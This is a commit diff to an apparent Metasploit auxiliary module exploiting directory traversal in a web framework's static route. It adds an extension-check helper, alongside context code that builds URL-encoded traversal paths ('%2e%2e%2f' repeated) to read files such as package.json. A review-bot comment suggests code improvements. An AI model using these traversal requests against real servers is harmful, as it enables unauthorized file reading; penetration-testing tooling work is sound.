Add a function to check extensions

Fabio Cogno 2019-03-11 22:23:11 +01:00
parent bb7be797b4
commit e906ecb163
1 changed files with 18 additions and 0 deletions


@ -49,6 +49,22 @@ class MetasploitModule < Msf::Auxiliary
) )
end end
def check_ext
extensions = %w[
flac jpg jpeg png gif ico js css txt xml
woff woff2 otf ttf eot svg zip rar pdf
docx xlsx doc xls html htm appcache
manifest map ogv ogg mp4 mp3 webp webm
swf package json md m4v jsx heif heic
]
ext = datastore['FILE'].split('.').last
unless extensions.include? ext
print_warning "Extension #{ext} is not supported by the HTTP static route of the framework"
end
end
def check def check
uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json' uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json'
res = send_request_cgi( res = send_request_cgi(
@ -77,6 +93,7 @@ class MetasploitModule < Msf::Auxiliary
end end
def read def read
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH'] traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE'] uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
@ -98,6 +115,7 @@ class MetasploitModule < Msf::Auxiliary
end end
def download def download
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH'] traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE'] uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
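Review bot: `check_ext` derives the extension with `datastore['FILE'].split('.').last`, which is `nil` for an empty FILE (the warning then reads "Extension  is not supported") and the whole name for a dotless file such as `Dockerfile`, so the message is misleading in both cases; `ext = File.extname(datastore['FILE'].to_s).sub(/\A\./, '')` yields an empty string for both and also tolerates an unset FILE. Whether the framework's static route matches extensions case-insensitively is not visible here; if it does, the current lookup falsely warns about e.g. `PNG`, and a `.downcase` before the `include?` would fix that. The extension list is rebuilt as a local array on every call from `read` and `download`; hoisting it to a frozen class-level constant such as `SUPPORTED_EXTENSIONS = %w[...].freeze` (with a one-line comment naming where the list comes from) avoids the per-call allocation and makes the origin of the whitelist clear. The bodies of `read` and `download` continue past the end of their hunks.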